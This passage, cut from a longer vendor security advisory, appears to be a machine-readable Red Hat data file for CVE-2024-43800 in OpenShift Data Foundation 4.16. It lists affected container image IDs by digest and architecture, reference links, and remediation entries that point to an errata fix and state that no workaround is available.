"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
